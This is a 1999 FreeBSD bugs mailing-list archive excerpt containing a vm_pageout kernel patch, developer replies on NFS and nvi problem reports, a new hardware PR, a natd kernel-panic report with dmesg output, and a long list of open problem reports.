this patch applied is stable although running for three hours with 15 memory hogs. -------------------------------->8------------------------------------------- diff -u sys.orig/vm/vm_pageout.c sys/vm/vm_pageout.c --- sys.orig/vm/vm_pageout.c Sun Aug 29 18:33:38 1999 +++ sys/vm/vm_pageout.c Mon Dec 13 17:20:38 1999 @@ -1136,8 +1136,9 @@ * make sure that we have swap space -- if we are low on memory and * swap -- then kill the biggest process. */ - if ((vm_swap_size == 0 || swap_pager_full) && - ((cnt.v_free_count + cnt.v_cache_count) < cnt.v_free_min)) { + if (vm_swap_size == 0 && + (cnt.v_free_count + cnt.v_cache_count) < cnt.v_free_min || + swap_pager_full) { bigproc = NULL; bigsize = 0; for (p = allproc.lh_first; p != 0; p = p->p_list.le_next) { @@ -1174,7 +1175,7 @@ bigproc->p_nice = PRIO_MIN; resetpriority(bigproc); wakeup(&cnt.v_free_count); - } + } } return force_wakeup; } -------------------------------->8------------------------------------------- Regards, Mitja To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 9:44:20 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 3EE5615430 for ; Mon, 13 Dec 1999 09:44:18 -0800 (PST) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id JAA09459; Mon, 13 Dec 1999 09:44:01 -0800 (PST) (envelope-from dillon) Date: Mon, 13 Dec 1999 09:44:01 -0800 (PST) From: Matthew Dillon Message-Id: <199912131744.JAA09459@apollo.backplane.com> To: Kevin Day Cc: toasty@dragondata.com, freebsd-bugs@FreeBSD.ORG Subject: Re: kern/8834: NFS can corrupt local file cache References: <199912130556.XAA97399@celery.dragondata.com> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> State-Changed-Why: :> The problem is believed to be fixed in 3.x and 4.x kernels, and possibly :> in 2.2.8 as well. A huge number of potential filesystem bugs were :> fixed in the last year. :> : :For the record, the problem still exists in 2.2.8, but not in 3.x or 4.x. :The problem also mentioned of weirdness occuring if an executable that is :executed across NFS exceeding the CPU limit still exists in at least 3.3 : :Kevin Uh foo. Ok. I don't think anything can be done about the filesystem corruption in 2.2.x, there have simply been too many bug fixes made in 3.x and 4.x that depend on other major modifications that cannot be backported. I'll checkout-out the CPU limit problem under 3.x and 4.x but I cannot guarentee we'll get the fix in before the deadline. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 9:50: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 74A721548C for ; Mon, 13 Dec 1999 09:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA03965; Mon, 13 Dec 1999 09:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id D0D6D154AE; Mon, 13 Dec 1999 09:45:36 -0800 (PST) Message-Id: <19991213174536.D0D6D154AE@hub.freebsd.org> Date: Mon, 13 Dec 1999 09:45:36 -0800 (PST) From: apedorenko@renins.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15460: Installation with Compaq SMART-2DH Array Controller Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15460 >Category: i386 >Synopsis: Installation with Compaq SMART-2DH Array Controller >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 09:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andrey Pedorenko >Release: FreeBSD 3.3-release >Organization: Renaissance Insurance >Environment: Compaq Proliant 3000R, 128MB RAM, SMART-2DH Array Controller >Description: During installation from floppy my Compaq SMART-2DH Array Controller is not recognised by FreeBSD. >How-To-Repeat: Every time >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 10:30: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8750A150BD for ; Mon, 13 Dec 1999 10:30:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA08580; Mon, 13 Dec 1999 10:30:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 10:30:07 -0800 (PST) Message-Id: <199912131830.KAA08580@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Frank Mayhar Subject: Re: bin/15450: The name of the tagfile is left in the path. Reply-To: Frank Mayhar Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15450; it has been noted by GNATS. From: Frank Mayhar To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: bin/15450: The name of the tagfile is left in the path. Date: Mon, 13 Dec 1999 10:26:04 -0800 I've submitted the patch to Keith Bostic; hopefully he'll integrate it into the next version of nvi. If someone could apply the patch to the nvi source, though, we could be a step ahead. (It's a very simple patch, as you can see.) -- Frank Mayhar frank@exit.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 10:33: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from alphaholdings.net (mail.alphaholdings.net [208.0.166.34]) by hub.freebsd.org (Postfix) with ESMTP id 9036314E5C for ; Mon, 13 Dec 1999 10:32:54 -0800 (PST) (envelope-from kyle@alphaholdings.com) Received: from it-tech-122 ([10.100.30.139]) by alphaholdings.net (8.9.3/8.9.2) with ESMTP id NAA03255 for ; Mon, 13 Dec 1999 13:32:55 -0500 (EST) (envelope-from kyle@alphaholdings.com) Message-Id: <4.2.2.19991213133212.00a63100@mail.alphaholdings.com> X-Sender: kyle@mail.alphaholdings.com (Unverified) X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Mon, 13 Dec 1999 13:35:08 -0500 To: freebsd-bugs@freebsd.org From: Kyle Patrick Subject: natd/IPDIVERT problem Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have just Found that ping -R outsideIP still causes a kernel panic just as mentioned in PR# 8596 and PR#11199 If you need any more info feel free to Reply to this address. --thanks for your time/attention .. Kyle Patrick My dmesg: Copyright (c) 1992-1999 FreeBSD Inc. Copyright (c) 1982, 1986, 1989, 1991, 1993 The Regents of the University of California. All rights reserved. FreeBSD 3.4-RC #1: Fri Dec 10 12:23:30 EST 1999 root@mail.nodarse.com:/usr/src/sys/compile/MAIL Timecounter "i8254" frequency 1193182 Hz Timecounter "TSC" frequency 398270145 Hz CPU: Pentium II/Xeon/Celeron (398.27-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x652 Stepping = 2 Features=0x183fbff real memory = 268435456 (262144K bytes) avail memory = 258248704 (252196K bytes) Preloaded elf kernel "kernel" at 0xc02d9000. Pentium Pro MTRR support enabled Probing for devices on PCI bus 0: chip0: rev 0x00 on pci0.0.0 chip1: rev 0x00 on pci0.1.0 fxp0: rev 0x05 int a irq 11 on pci0.2.0 fxp0: Ethernet address 00:a0:c9:ac:5f:ae chip2: rev 0x02 on pci0.12.0 ide_pci0: rev 0x01 on pci0.12.1 chip3: rev 0x02 on pci0.12.3 ahc0: rev 0x00 int a irq 11 on pci0.13.0 ahc0: aic7890/91 Wide Channel A, SCSI Id=7, 16/255 SCBs vga0: rev 0x00 int a irq 11 on pci0.15.0 fxp1: rev 0x05 int a irq 9 on pci0.16.0 fxp1: Ethernet address 00:90:27:25:0c:89 Probing for devices on PCI bus 1: Probing for devices on the ISA bus: sc0 on isa sc0: VGA color <16 virtual consoles, flags=0x0> ed0 not found at 0x280 atkbdc0 at 0x60-0x6f on motherboard atkbd0 irq 1 on isa psm0 irq 12 on isa psm0: model IntelliMouse, device ID 3 sio0 at 0x3f8-0x3ff irq 4 flags 0x10 on isa sio0: type 16550A sio1 at 0x2f8-0x2ff irq 3 on isa sio1: type 16550A fdc0 at 0x3f0-0x3f7 irq 6 drq 2 on isa fdc0: FIFO enabled, 8 bytes threshold fd0: 1.44MB 3.5in wdc0 at 0x1f0-0x1f7 irq 14 on isa wdc0: unit 0 (wd0): wd0: 4112MB (8421840 sectors), 8912 cyls, 15 heads, 63 S/T, 512 B/S wdc1 not found at 0x170 ppc0 at 0x378 irq 7 flags 0x40 on isa ppc0: SMC-like chipset (ECP/EPP/PS2/NIBBLE) in COMPATIBLE mode ppc0: FIFO with 16/16/8 bytes threshold lpt0: on ppbus 0 lpt0: Interrupt-driven port ppi0: on ppbus 0 plip0: on ppbus 0 ep0 not found at 0x300 bt0 not found at 0x134 vga0 at 0x3b0-0x3df maddr 0xa0000 msize 131072 on isa npx0 on motherboard npx0: INT 16 interface IP packet filtering initialized, divert enabled, rule-based forwarding enabled, default to accept, logging limited to 100 packets/entry by default Waiting 15 seconds for SCSI devices to settle sa0 at ahc0 bus 0 target 4 lun 0 sa0: Removable Sequential Access SCSI-2 device sa0: 7.812MB/s transfers (7.812MHz, offset 15) changing root device to wd0s1a cd0 at ahc0 bus 0 target 2 lun 0 cd0: Removable CD-ROM SCSI-2 device cd0: 20.000MB/s transfers (20.000MHz, offset 15) cd0: Attempt to query device size failed: NOT READY, Medium not present To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 11: 1:15 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9AE6A14C20 for ; Mon, 13 Dec 1999 11:00:21 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA11976 for freebsd-bugs@freebsd.org; Mon, 13 Dec 1999 11:00:09 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 13 Dec 1999 11:00:09 -0800 (PST) Message-Id: <199912131900.LAA11976@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1996/12/20] bin/2258 wollman route add/delete [network] xxx.yyy.zzz.0 o [1997/03/08] kern/2923 panic: vm_fault: fault on nofault entry, o [1997/07/03] kern/4021 peter Local mount of a local NFS exported direc o [1997/07/31] kern/4200 peter NFS: "vm_fault: fault on nofault entry" w o [1997/10/01] kern/4673 Two panics, now crash dumps, always in re o [1997/11/24] bin/5139 portmap does not find interfaces correctl f [1997/12/21] kern/5355 Fix for NULLFS problems o [1998/02/03] kern/5641 peter running processes at the IDLE priority (i o [1998/02/10] kern/5703 CDROM Media Error triggers complete syste o [1998/03/23] bin/6121 peter gethostbyname(3) no longer returns NO_DAT s [1998/05/13] kern/6630 julian [PATCH] Fix for Cyrix I8254 bug o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/08/15] kern/7622 Kernel panic with Fatal trap 18. o [1998/09/08] i386/7859 luigi fatal trap 12 in midi_synth_input f [1998/09/14] kern/7927 n_hibma Fatal trap 12: page fault while in kernel o [1998/09/28] kern/8074 se CAM rescan operation fatal o [1998/10/03] gnu/8138 obrien gcc -pipe xxx.s hangs f [1998/10/06] i386/8179 Install failure with motherbord using SIS f [1998/10/08] i386/8214 n_hibma Install 3.0-19981006-BETA fails a [1998/11/08] ports/8609 nectar eklogin service (kerberos klogind) fails f [1998/11/12] i386/8673 bug in vm_page_alloc_contig() o [1998/11/24] bin/8829 bug in innetgr (was: Fix port: security/s f [1998/11/25] kern/8861 n_hibma under heavy (multi interface) traffic ep0 f [1998/12/09] kern/9036 Boot 3.0-Release hangs with BT-445S after a [1999/01/05] kern/9334 n_hibma cp fails for 2048 Bytes/sector media o [1999/01/27] kern/9742 tx driver for smc autodetects fine, but n o [1999/02/02] misc/9885 BIND 8.1.2 core dumping o [1999/02/19] kern/10166 panic during heavy sio i/o;no coproc; ves o [1999/02/20] kern/10172 panic: cannot allocate pipe - out of kvm o [1999/02/23] kern/10224 panic: pipeinit: cannot allocate pipe -- s [1999/02/26] kern/10281 Crash of 3.1-STABLE system due to scsi er o [1999/02/26] i386/10282 PCMCIA problems in 3.1-RELEASE? o [1999/03/01] kern/10332 gibbs System freezes during certain SCSI activi o [1999/03/01] bin/10344 fenner Core dump in gethostbyaddr for 199.93.70. o [1999/03/05] kern/10397 3.1R page fault while in kernel mode, fro o [1999/03/07] misc/10473 Incorrect aout compat libraries in XF8633 o [1999/03/09] kern/10507 Process hangs in state VM pgd o [1999/03/09] misc/10509 Cvs can hang system when used with pserve o [1999/03/09] kern/10520 can't exec files under nullfs o [1999/03/11] kern/10542 page fault while in kernel mode, not kern o [1999/03/11] kern/10545 When a fork/exec stress test is run, the o [1999/03/12] misc/10566 obrien patch dhcpc problem on /etc/pccard_ether o [1999/03/17] kern/10636 ipfw problems o [1999/03/19] i386/10683 I have a buslogic BT-948 FW controller. W o [1999/03/20] i386/10690 Installation freezes after device selecti f [1999/03/20] kern/10701 ppbus printing problems o [1999/03/22] ports/10725 stb Wrong Cyrus IMAP deliver group o [1999/03/23] bin/10744 call to login() from aout/libutil.so.2.2 o [1999/03/27] kern/10828 3.1-STABLE freezes when writing to floppy o [1999/03/29] kern/10866 ahc2740 panic o [1999/03/30] kern/10872 Panic in sorecieve() due to NULL mbuf poi o [1999/04/05] kern/10959 3.1-STABLE crashes due to a floppy mount o [1999/04/05] ports/10965 obrien lcc-3.6 unable to compile anything o [1999/04/08] kern/11023 Synchronous PPP not functional in leased o [1999/04/13] kern/11112 Amanda on FreeBSD can wipe the _next_ tap o [1999/04/16] kern/11180 boot of fresh bsd3.1 hangs o [1999/04/17] kern/11196 n_hibma kernel mode page fault o [1999/04/19] kern/11226 Invalid files on disk after fsync o [1999/04/20] kern/11238 Synchronous PPP not functional in leased o [1999/04/20] kern/11241 Install fails after SCSI probe o [1999/04/22] i386/11278 FreeBSD Version 3.1 reboots repeatedly (c o [1999/04/23] i386/11298 Enabling IDE DMA on Opti Viper-M crashes o [1999/04/26] kern/11330 page fault in generic_bzero o [1999/04/26] conf/11343 worm; problems with installation and boot o [1999/04/26] i386/11349 Error Mounting /dev/wd0s1 on dist during o [1999/04/27] kern/11351 system reboot for error with popper and d o [1999/05/01] kern/11434 can't boot from wd0s2a a [1999/05/03] kern/11470 dillon V3 NFS problem o [1999/05/04] i386/11488 Error while starting FreeBSD o [1999/05/10] kern/11629 File descriptor table sharing is broken o [1999/05/12] kern/11680 server freezes, all processes stuck in "i o [1999/05/13] i386/11681 gibbs Adaptec 2940 UW SCSI Controller BIOS 1.34 o [1999/05/14] kern/11707 ncr isn't recognized in 3.1-19990512-STAB f [1999/05/17] bin/11744 perllib fails to build o [1999/05/24] kern/11869 wpaul Network hangging due to xl0: tx underrun o [1999/05/31] kern/11966 TCP copies send and receive socket buffer f [1999/06/01] kern/11984 pthread_kill cannot kill select() threads o [1999/06/02] kern/11988 recvmsg with a cmsghdr but no iovec is br o [1999/06/02] kern/11993 panic: getnewbuf: inconsistent EMPTY queu f [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch o [1999/06/06] conf/12050 No /sbin/init on fixit flop o [1999/06/07] kern/12072 vm_fault happened in binary file transfer o [1999/06/09] ports/12098 se KDM not config'd properly o [1999/06/09] kern/12106 error 6: panic: cannot mount root o [1999/06/10] kern/12127 persistent crash on idle SMP system o [1999/06/15] kern/12233 Fvwm2 causes FreeBSD-current to hang or r o [1999/06/16] bin/12243 NFS re-mount from Solaris 7 server hangs o [1999/06/16] kern/12248 CRON in malloc(): warning: pointer to wr o [1999/06/18] i386/12286 Segmentation violation when invoking JNI s [1999/06/23] kern/12367 Writing files larger than floppy capacity o [1999/06/25] misc/12390 Installation hangs during extraction o [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/06/30] kern/12466 Fast system hangs under high FS load o [1999/07/05] kern/12521 lmbench-1.1's context switching test hang o [1999/07/12] misc/12607 System crashes after boot, portmap endles o [1999/07/13] alpha/12623 alpha Certain valid numeric strings cause a SIG f [1999/07/20] misc/12720 gdbm (And possibly other libraries in /us o [1999/07/21] kern/12730 poll() causes indeterministic program han o [1999/07/21] misc/12743 Cannot boot the 3.2 floppies o [1999/08/02] misc/12923 Installation fails on HP Net Server o [1999/08/04] kern/12980 NetGear Dec 21140AF Ethernet Card unrecog o [1999/08/06] bin/12998 des still inetd junk pointer too low to make o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C o [1999/08/11] kern/13075 signal is not posted for async I/O on raw a [1999/08/20] kern/13270 dillon NFS hangs if written through self-mount o [1999/08/23] alpha/13338 alpha panic: pmap_remove_all: pv_table for 162b o [1999/08/24] kern/13352 No support for Promise Ultra/66 o [1999/08/30] misc/13474 Maximum Number of IPs Permitted in the .. o [1999/09/07] bin/13615 awk corrupts the memory arena when OFMT i o [1999/09/09] alpha/13653 alpha panic: pmap_remove_all: pv_table for 90b6 o [1999/09/12] kern/13709 panic: sched_sync: fsync failed o [1999/09/17] i386/13797 SMP/NFS panics on 3.3-RC o [1999/09/18] i386/13802 freebsd 3.3 fails to boot with irq proble o [1999/09/19] i386/13817 system reboot o [1999/09/19] kern/13825 tx0 "holds" packets for long periods, eve o [1999/09/19] i386/13844 keyboard locks up when I page through a m f [1999/09/20] i386/13849 grog dump on vinum r5 freezes system o [1999/09/22] i386/13892 Kern.flp does not boot on Compaq Presario o [1999/09/24] i386/13933 nfs server panics in tulip_rx_intr() o [1999/09/24] kern/13940 Panic with dd on block/"cooked" devices u o [1999/09/24] kern/13944 ATAPI cd-rom not boot to install, nor de o [1999/09/27] misc/13995 Full duplex mode doesn't work right with o [1999/09/28] kern/14028 ATAPI cd-rom not boot to install and can' o [1999/09/28] i386/14030 imp aha0 probe fails 3.3.0-RELEASE install wi o [1999/10/05] kern/14141 3.3-RELEASE crashing often o [1999/10/05] ports/14154 obrien xwpe is not completely compiled o [1999/10/06] kern/14162 sudden reboot problem ( maybe kernel pani o [1999/10/08] misc/14204 error 6: panic: cannot mout root(2) o [1999/10/10] i386/14256 System doesn't boot under FreeBSD 3.2 o [1999/10/14] kern/14322 mount respects permissions of underlying o [1999/10/15] kern/14347 kdump & truss won't compile because addit o [1999/10/17] i386/14373 Error while booting from floppy disk o [1999/10/24] i386/14492 FreeBSD won't install/work with an Asus S o [1999/10/25] kern/14510 kernel panic while pressing sin_family o [1998/02/01] kern/5618 kernel memory leak in routetbl. o [1998/02/01] kern/5624 dumping to tape causes scsi bus reset o [1998/02/04] kern/5643 NCR 810/815 do not handle rewind correctl o [1998/02/09] bin/5693 hoek groff -mm or groff -mmm ??? o [1998/02/10] i386/5698 des LPIP causes spurious reboots o [1998/02/17] gnu/5767 man leaves partially formatted cat pages o [1998/02/19] kern/5794 Kernel Panic f [1998/02/27] bin/5867 peter pppd or FreeBSD ? o [1998/02/28] kern/5877 sb_cc counts control data as well as data o [1998/03/09] bin/5959 Cannot set up clocal gettys o [1998/03/10] kern/5969 non-root user can reboot/lock up system o [1998/03/11] kern/5975 can't boot freebsd: fatal trap12: page fa o [1998/03/14] conf/6002 peter /etc/mail/sendmail.cf.addtions seems to l o [1998/03/16] kern/6035 The system "sort-of" hangs when playing b o [1998/03/19] kern/6066 lnc driver does not work correctly with A o [1998/03/22] i386/6099 des LPIP to slow machine causes hang o [1998/03/22] kern/6103 panic: ffs_valloc: dup alloc o [1998/03/28] bin/6162 kinit does not default to the current use o [1998/04/03] kern/6203 kernel panics with "blkfree: freeing free o [1998/04/03] conf/6205 NFS/NIS freak out o [1998/04/04] kern/6212 Two bugs with MFS filesystems fixed, one o [1998/04/07] kern/6238 luigi Sound-driver patch for MAD16 (OPTi 928,92 o [1998/04/08] kern/6251 peter ktrace very broken when logging over NFS o [1998/04/08] kern/6252 ide cdrom hangs system when on same bus a o [1998/04/09] kern/6253 Atapi wait for command phase too short. o [1998/04/10] kern/6267 dg panic: pmap_dispose_proc: upage already m o [1998/04/14] kern/6300 System locks up in SMP mode when accessin o [1998/04/18] kern/6344 cy driver is outdated o [1998/04/19] kern/6351 DPT RAID controller stops working under h o [1998/04/20] i386/6368 Stallion Easyio 8 port not detected using o [1998/04/22] bin/6383 csh - when ctrl-d is pressed, file is chm o [1998/05/03] kern/6506 system will not soft reboot f [1998/05/05] kern/6525 Coral-Draw 5 CD crashes 2.2.6-STABLE a [1998/05/06] bin/6536 pppd doesn't restore drainwait for tty o [1998/05/08] bin/6557 /bin/sh is broken o [1998/05/10] bin/6577 /bin/sh environment variables not set in o [1998/05/11] ports/6591 se KDE starts /usr/bin/kzip instead of /usr/ o [1998/05/12] kern/6603 ncr driver hangs under high load o [1998/05/12] bin/6609 gmp.h not installed o [1998/05/17] kern/6670 PANIC on boot with FreeBSD 3.0 (same comp s [1998/05/19] kern/6686 [STABLE] -stable does not support large I o [1998/05/20] kern/6706 mount_msdos+mount_null+mc=panic o [1998/05/25] kern/6751 audio cd play suddenly stops. o [1998/05/25] kern/6755 peter Tulip (if_de) driver buggy in -current s [1998/05/27] misc/6773 [PATCH] tempnam.c security problems s [1998/06/02] bin/6830 make(1) exhibits confusing and non-standa s [1998/06/04] kern/6854 [PATCH] probing brooktree849 capture card s [1998/06/04] kern/6858 inetd in realloc(): warning: junk pointer o [1998/06/04] misc/6861 [PATCH] netboot error o [1998/06/05] kern/6865 OS crashes when exiting shell with suspen o [1998/06/10] kern/6908 kernel crash from user land o [1998/06/19] bin/6994 The netstat(1) -s generates wrong output f [1998/06/19] i386/6996 Occasional complete lockup of 2.2.5R s [1998/06/22] bin/7019 [security] pwd.db almost always contains s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] kern/7038 shimon Kernel panic caused by DPT driver (Got a s [1998/06/24] bin/7043 the fstat command doesn't know ISOFS, MSD o [1998/06/24] i386/7057 3Com 3C509 locks up, or has >1000ms rtt u s [1998/06/24] bin/7059 sh dumps core on this script o [1998/06/24] ports/7061 ache fspclient's grab command fails (and remov o [1998/07/05] ports/7167 ache elm cannot pgp for more than one recipien s [1998/07/05] kern/7169 cannot use accton on a append-only file o [1998/07/05] kern/7178 sos IDE Western Digital hard disk detection e s [1998/07/06] misc/7190 jkh "Invalid partition table" after new insta s [1998/07/10] kern/7237 NCR SCSI driver ch0 troubles o [1998/07/11] kern/7245 processes die with signal 6, if machine o o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/07/14] kern/7281 [STABLE] Multicast kludge does not work c o [1998/07/21] conf/7354 source distribution selection bug when in f [1998/07/22] kern/7367 panic: malloc: wrong bucket o [1998/07/23] ports/7383 imp socks5 + ssh + redirection not working o [1998/07/26] kern/7405 in pmap_changebit, pmap_pte_quick() retur s [1998/07/27] kern/7410 [PATCH] driver for arlan-655 s [1998/07/27] i386/7420 [PATCH] Maximum socket buffer size (SB_MA o [1998/07/28] kern/7424 Machine crashes do not occur very often, o [1998/07/30] bin/7446 jdp Dlopen succeed in particular cases, but i o [1998/08/04] ports/7490 ache `setenv LANG/LC_CTYPE C` makes tcsh unusa s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/08/10] kern/7557 -current machine running Diablo, lockup, s [1998/08/10] kern/7561 CDROM (wcd) is prone to lock up system/pr s [1998/08/10] kern/7562 Running wine can cause other applications o [1998/08/12] bin/7587 There is no pthread_cancel() in libc_r.a! o [1998/08/18] kern/7658 (1) rlogin from some host to the FreeBSD o [1998/08/18] kern/7664 scsiformat reports '0' for all parameters o [1998/08/18] conf/7665 sysinstall quits silently o [1998/08/19] kern/7678 Problems with a 386-16 f [1998/08/20] i386/7698 n_hibma scotty/tkined library error o [1998/08/27] kern/7754 kernel panics if NFS server uses LKM vs. o [1998/08/27] bin/7756 disklabel misbehaving on seriously sick d o [1998/08/27] kern/7764 ps(1) hangs in pfslck/lockrd - All subseq o [1998/08/27] kern/7766 de driver still buggy - random ifc death o [1998/08/27] kern/7767 de driver still buggy - power cycle of de o [1998/09/01] kern/7797 System halted with "panic: pmap_release: o [1998/09/02] i386/7815 probe can't find wdc0 s [1998/09/03] gnu/7821 awk in free(): warning: chunk is already o [1998/09/03] conf/7823 sysinstall will not install XFree o [1998/09/09] bin/7872 [PATCH] mountd(8) can apply flags to wron o [1998/09/09] bin/7876 gethostbyname flags temporary failure as o [1998/09/09] bin/7877 fenner libpcap and tcpdump need updating o [1998/09/10] kern/7880 mount_cd9660 incorrect on multitrack CD-R o [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/12] conf/7908 wrong perms on objformat after upgrade o [1998/09/16] kern/7950 Trap 12 while executing wine o [1998/09/16] gnu/7951 The gnu readline library core dumps when o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas o [1998/09/22] conf/8031 [patch] /etc/rc looks for /etc/sendmail.c o [1998/09/28] misc/8070 can't get a system with an NCR 810 contro o [1998/09/28] i386/8081 Problem with MULTIPORT driver and Boca BB o [1998/09/29] bin/8085 sendmail startup could be backgrounded o [1998/09/30] gnu/8099 [patch] some bugs in cpio o [1998/10/03] kern/8137 [patch] quotaoff followed by quotaon can o [1998/10/05] kern/8158 sio driver breaks in 2.2.7R in kernels wi o [1998/10/06] kern/8180 open("..",O_RDONLY|O_NONBLOCK) fails o [1998/10/07] bin/8195 ee dumps core on window resize o [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/10/08] kern/8215 Creating 2 root partitions in sysinstall o [1998/10/11] bin/8266 [patch] nfsd should allow just nfs versio o [1998/10/12] bin/8281 writev() in libc_r causes loop o [1998/10/13] kern/8312 Under heavy load, the system panics with o [1998/10/14] bin/8322 Mail doesn't respect REPLYTO in .mailrc o [1998/10/14] kern/8324 failure to deliver SIGIO when fildes mark o [1998/10/19] conf/8379 check_rcpt returns OK for nonexistent add o [1998/10/20] kern/8380 swap_page error: out of swap space o [1998/10/20] i386/8385 2.2.7 hangs while detecting type of COM1' o [1998/10/20] ports/8394 peter rdist6 won't compile--tries to use MOUNT_ o [1998/10/21] i386/8397 Code using popen compiled on BSDI BSD/OS o [1998/10/22] i386/8414 ibcs2 emulation sets serial baud-rate inc o [1998/10/22] kern/8415 SMP kernel freezes while downloading larg s [1998/10/22] kern/8417 3.0 config(8) doesn't check that root fs o [1998/10/22] i386/8418 sh MAKEDEV all - fails to create hard lin o [1998/10/23] kern/8423 Intel PILA8461 NIC panics 2.2.7 during pr o [1998/10/24] i386/8435 boot.flp does not give shell prompt after o [1998/10/28] misc/8480 odd Korean timedef(LC_TIME) o [1998/10/31] bin/8518 freopen() in append mode followed by ftel o [1998/11/01] kern/8534 insufficient support routines for poll(2) o [1998/11/03] kern/8561 /kernel inode change time changes every r o [1998/11/03] i386/8567 Intel EtherExpress Pro/10 driver (if_ex.c o [1998/11/05] kern/8580 Hanging NFS pagein in nfs_bio.c (2.2.7, w o [1998/11/07] kern/8590 kernel incorrectly recognizing Maxtor 11. o [1998/11/07] kern/8596 panic: page fault while using ping's reco o [1998/11/08] kern/8607 maxprocsperuid setting causes sybase/linu o [1998/11/08] kern/8619 EXT2FS should be in GENERIC kernel o [1998/11/08] ports/8622 peter exmh2 has problems with some date formats s [1998/11/09] misc/8623 wollman [MFC] Time zone for Japan is strange (see o [1998/11/10] bin/8646 Implement rlogind -a option o [1998/11/11] kern/8655 Umount trouble of SCSI removable device o [1998/11/11] kern/8657 nfs client hung in nfs_bwrite/vfs_busy_pa o [1998/11/12] kern/8669 aio_write() and aio_read() do not work AT o [1998/11/14] kern/8683 sos Problems with Atapi in 3.0... o [1998/11/14] bin/8685 sending a SYST by ftp client closes conne o [1998/11/17] kern/8729 SYSV Semaphore blocks all threads o [1998/11/18] bin/8745 wosch adduser permit adding `root' and mail ali o [1998/11/20] kern/8773 Intel AN430TX motherboard ps/2 port not r f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S o [1998/11/23] kern/8824 Incorrect driver unit number in IDE BusMa o [1998/11/24] conf/8854 boot.flp does not probe atapi cdrom o [1998/11/24] i386/8855 sos can't mount CD in ATAPI drive after eject o [1998/11/25] bin/8865 syslogd hangs with serial console a [1998/11/28] kern/8875 Patch to allow 